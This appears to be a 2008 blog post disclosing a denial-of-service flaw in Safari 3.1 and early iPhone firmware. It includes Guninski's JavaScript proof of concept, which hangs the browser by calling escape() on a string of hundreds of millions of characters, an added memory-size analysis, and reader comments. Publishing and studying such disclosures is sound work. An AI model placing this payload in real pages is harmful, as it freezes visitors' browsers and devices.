Safari 3.1 JavaScript DoS Released

Georgi Guninski has discovered a denial of service vulnerability in Safari 3.1 that causes the browser to hang (not crash). The DoS also affects iPhones running firmware version 1.1.4 and all earlier versions.

When visiting a site that serves the malformed JavaScript, the iPhone locks up and the user has to reboot the phone. The current workaround is to disable JavaScript on your iPhone and/or iPod touch.

Below is the source of the PoC, which triggers the hang (not a crash).

Copyright Georgi Guninski

Cannot be used in vulnerability databases

Especially securityfocus/mitre/cve/cert
SCRIPT
// Guninski's PoC as posted; only the mis-encoded quotes are repaired and comments added.
var s=String.fromCharCode(257);   // a single non-Latin-1 character (U+0101)
var ki="";
var me="";
for(var i=0;i<1024;i++)
{ki=ki+s;}                        // ki: 1024 characters
for(var i=0;i<1024;i++)
{me=me+ki;}                       // me: 1024*1024 characters
var ov=s;
for(var i=0;i<28;i++) ov += ov;   // doubles 28 times: 2^28 characters
for(var i=0;i<88;i++) ov += me;   // plus 88 more copies of me

alert("done generating");
var fuckbill=escape(ov);          // escape() on this string is where the browser hangs
alert("done escape");
alert(fuckbill);
SCRIPT
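To see why the escape() call never returns in practice, the following added example (not Guninski's code, and not part of the original post) tracks only the string lengths the PoC would produce, without allocating anything. The byte figures assume a two-byte-per-character string representation, which is an assumption about the engine, not something the post states.

```javascript
// Length accounting for the PoC above: same loop structure, but each
// variable holds a length (in UTF-16 code units) instead of a string.
function pocStringLengths() {
  const s = 1;                                  // String.fromCharCode(257) is one unit
  let ki = 0;
  for (let i = 0; i < 1024; i++) ki += s;       // 1024
  let me = 0;
  for (let i = 0; i < 1024; i++) me += ki;      // 1024 * 1024
  let ov = s;
  for (let i = 0; i < 28; i++) ov += ov;        // 2^28 after 28 doublings
  for (let i = 0; i < 88; i++) ov += me;        // + 88 * 2^20
  return { ki, me, ov };
}

// escape() encodes a code unit above 0xFF as "%uXXXX": six ASCII characters
// per input character. Measure that expansion on a single sample character
// rather than hard-coding it.
function escapedLength(inputLength, sampleChar) {
  const perChar = escape(sampleChar).length;    // 6 for U+0101
  return inputLength * perChar;
}

// Summarise what the PoC asks the engine to hold in memory (assumed 2 bytes
// per character; a constructed estimate, not a measurement of Safari).
function estimate() {
  const { ov } = pocStringLengths();
  const out = escapedLength(ov, String.fromCharCode(257));
  return {
    inputChars: ov,                // 360,710,144
    inputBytes: ov * 2,            // ~688 MiB
    outputChars: out,              // 2,164,260,864
    outputBytes: out * 2,          // ~4.03 GiB, more than a 32-bit process can address
  };
}
```

The input alone is hundreds of megabytes, and the escaped result exceeds the 4 GiB address space of a 32-bit device, so on a 2008-era iPhone the escape() call cannot complete regardless of how long it runs.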

4 Comments »

  1. Bert JW Regeer Said,

    March 27, 2008 @ 2:15 am

    Is there a link to the exploit listing on his website? I am unable to find it whatsoever, so I am wondering where you got this.

    Bert JW Regeer

  2. Tom Ferris Said,

    April 1, 2008 @ 2:09 pm

    The proof-of-concept code is within the post… ?

  3. Rick Said,

    April 25, 2008 @ 6:24 am

    Tom: where’s GG hanging out these days? Guninski.com hasn’t been updated in years.

  4. Tom Ferris Said,

    April 25, 2008 @ 9:52 am

    Rick: Last I heard, he was working at some grocery store..
